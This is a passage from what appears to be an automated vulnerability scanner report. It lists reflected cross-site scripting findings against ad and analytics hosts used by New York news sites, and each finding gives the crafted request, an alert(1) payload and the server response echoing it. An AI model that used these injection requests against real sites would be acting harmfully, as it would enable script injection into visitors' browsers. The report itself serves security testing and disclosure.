User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 27 Sep 2011 13:23:07 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:07 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7553

var ERA_RC=window.ERA_RC||{script_element_id:'era_rc_script'};ERA_RC.resource=function(){var $={};return{init:function(){var params={blockid:'/news-story-300x225',elid:'ERA_AD_BLOCK412f4';alert(1)//badb9c1958',eradomain:'as.vs4entertainment.com',pubid:'nypost'};var elname="ERA_RC"
var blockID=ERA_RC.resource.getParam(params,"BlockID");if(blockID!=null)
blockID="_"+blockID.replace(/[^-\w.]/g,'');else
blockI
...[SNIP]...

2.4. http://as.vs4entertainment.com/ERA/era_rl.aspx [eradomain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/era_rl.aspx

Issue detail

The value of the eradomain request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c855'%3balert(1)//924b8551b3d was submitted in the eradomain parameter. This input was echoed as 6c855';alert(1)//924b8551b3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ERA/era_rl.aspx?elid=ERA_AD_BLOCK&eradomain=as.vs4entertainment.com6c855'%3balert(1)//924b8551b3d&pubid=nypost&blockid=%2Fnews-story-300x225 HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 27 Sep 2011 13:23:05 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7555

var ERA_RC=window.ERA_RC||{script_element_id:'era_rc_script'};ERA_RC.resource=function(){var $={};return{init:function(){var params={blockid:'/news-story-300x225',elid:'ERA_AD_BLOCK',eradomain:'as.vs4entertainment.com6c855';alert(1)//924b8551b3d',pubid:'nypost'};var elname="ERA_RC"
var blockID=ERA_RC.resource.getParam(params,"BlockID");if(blockID!=null)
blockID="_"+blockID.replace(/[^-\w.]/g,'');else
blockID="";blockID=blockID.substr(0,20);va
...[SNIP]...

2.5. http://as.vs4entertainment.com/ERA/era_rl.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/era_rl.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b5d4f%3balert(1)//f2cc153bbc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5d4f;alert(1)//f2cc153bbc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ERA/era_rl.aspx?elid=ERA_AD_BLOCK&eradomain=as.vs4entertainment.com&pubid=nypost&blockid=%2Fnews-story-300x225&b5d4f%3balert(1)//f2cc153bbc8=1 HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 27 Sep 2011 13:23:02 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7563

var ERA_RC=window.ERA_RC||{script_element_id:'era_rc_script'};ERA_RC.resource=function(){var $={};return{init:function(){var params={b5d4f;alert(1)//f2cc153bbc8:'1',blockid:'/news-story-300x225',elid:'ERA_AD_BLOCK',eradomain:'as.vs4entertainment.com',pubid:'nypost'};var elname="ERA_RC"
var blockID=ERA_RC.resource.getParam(params,"BlockID");if(blockID!=null)
b
...[SNIP]...

2.6. http://as.vs4entertainment.com/ERA/era_rl.aspx [pubid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/era_rl.aspx

Issue detail

The value of the pubid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c4f6'%3balert(1)//09d5c328ec2 was submitted in the pubid parameter. This input was echoed as 7c4f6';alert(1)//09d5c328ec2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ERA/era_rl.aspx?elid=ERA_AD_BLOCK&eradomain=as.vs4entertainment.com&pubid=nypost7c4f6'%3balert(1)//09d5c328ec2&blockid=%2Fnews-story-300x225 HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 27 Sep 2011 13:23:08 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7555

var ERA_RC=window.ERA_RC||{script_element_id:'era_rc_script'};ERA_RC.resource=function(){var $={};return{init:function(){var params={blockid:'/news-story-300x225',elid:'ERA_AD_BLOCK',eradomain:'as.vs4entertainment.com',pubid:'nypost7c4f6';alert(1)//09d5c328ec2'};var elname="ERA_RC"
var blockID=ERA_RC.resource.getParam(params,"BlockID");if(blockID!=null)
blockID="_"+blockID.replace(/[^-\w.]/g,'');else
blockID="";blockID=blockID.substr(0,20);var elementID=eln
...[SNIP]...

2.7. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 6904d<script>alert(1)</script>5be03c41bfa was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=86904d<script>alert(1)</script>5be03c41bfa&c2=2113&c3=13&c4=16996&c5=45106&c6=&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:01 GMT
Date: Tue, 27 Sep 2011 13:21:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"86904d<script>alert(1)</script>5be03c41bfa", c2:"2113", c3:"13", c4:"16996", c5:"45106", c6:"", c10:"238224", c15:"", c16:"", r:""});



2.8. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 8b9ba<script>alert(1)</script>af4c83d0f3f was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16996&c5=45106&c6=&c10=2382248b9ba<script>alert(1)</script>af4c83d0f3f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:03 GMT
Date: Tue, 27 Sep 2011 13:21:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16996", c5:"45106", c6:"", c10:"2382248b9ba<script>alert(1)</script>af4c83d0f3f", c15:"", c16:"", r:""});



2.9. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload bf8fb<script>alert(1)</script>0723199eeda was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16996&c5=45106&c6=&c10=238224&c15=bf8fb<script>alert(1)</script>0723199eeda HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:03 GMT
Date: Tue, 27 Sep 2011 13:21:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16996", c5:"45106", c6:"", c10:"238224", c15:"bf8fb<script>alert(1)</script>0723199eeda", c16:"", r:""});



2.10. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1e19b<script>alert(1)</script>4124e2385df was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=21131e19b<script>alert(1)</script>4124e2385df&c3=13&c4=16996&c5=45106&c6=&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:01 GMT
Date: Tue, 27 Sep 2011 13:21:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"21131e19b<script>alert(1)</script>4124e2385df", c3:"13", c4:"16996", c5:"45106", c6:"", c10:"238224", c15:"", c16:"", r:""});



2.11. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 8ae0b<script>alert(1)</script>1118414c0c2 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=138ae0b<script>alert(1)</script>1118414c0c2&c4=16996&c5=45106&c6=&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:01 GMT
Date: Tue, 27 Sep 2011 13:21:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"138ae0b<script>alert(1)</script>1118414c0c2", c4:"16996", c5:"45106", c6:"", c10:"238224", c15:"", c16:"", r:""});



2.12. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 87afb<script>alert(1)</script>50fb9703572 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=1699687afb<script>alert(1)</script>50fb9703572&c5=45106&c6=&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:02 GMT
Date: Tue, 27 Sep 2011 13:21:02 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"1699687afb<script>alert(1)</script>50fb9703572", c5:"45106", c6:"", c10:"238224", c15:"", c16:"", r:""});



2.13. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 4ceee<script>alert(1)</script>6b376d7bb4 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16996&c5=451064ceee<script>alert(1)</script>6b376d7bb4&c6=&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:02 GMT
Date: Tue, 27 Sep 2011 13:21:02 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16996", c5:"451064ceee<script>alert(1)</script>6b376d7bb4", c6:"", c10:"238224", c15:"", c16:"", r:""});



2.14. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9b911<script>alert(1)</script>4998ec56006 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=16996&c5=45106&c6=9b911<script>alert(1)</script>4998ec56006&c10=238224&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129667456&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 11 Oct 2011 13:21:03 GMT
Date: Tue, 27 Sep 2011 13:21:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"16996", c5:"45106", c6:"9b911<script>alert(1)</script>4998ec56006", c10:"238224", c15:"", c16:"", r:""});



2.15. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7be9"><script>alert(1)</script>2e49e0b6fd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3c7be9"><script>alert(1)</script>2e49e0b6fd2/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 399
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/UndertoneB3c7be9"><script>alert(1)</script>2e49e0b6fd2/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236/2123110493/x90/default/empty.gif/4d686437616b36427a6f454141624e4a?x" target="_top">
...[SNIP]...

2.16. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a164a"><script>alert(1)</script>3735745c4df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/UndertoneB3/VolkswagenBTConqa164a"><script>alert(1)</script>3735745c4df/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:24:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html

